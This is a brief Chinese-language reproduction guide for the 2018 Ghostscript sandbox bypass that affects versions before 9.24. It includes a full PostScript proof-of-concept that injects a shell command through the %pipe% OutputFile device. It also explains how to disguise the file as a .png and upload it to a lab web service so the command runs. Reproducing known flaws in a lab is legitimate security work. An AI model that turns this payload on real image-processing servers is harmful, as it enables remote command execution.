漏洞背景
2018年8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。
影响范围
Artifex Ghostscript 9.24之前版本
漏洞复现
先下载Poc图片,源码:
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
也可以自行复制保存为.png
后缀文件
启动环境后,访问http://your-ip:8080
能够看到上传页面,上传该图片便可以执行id > /tmp/success && cat /tmp/success
命令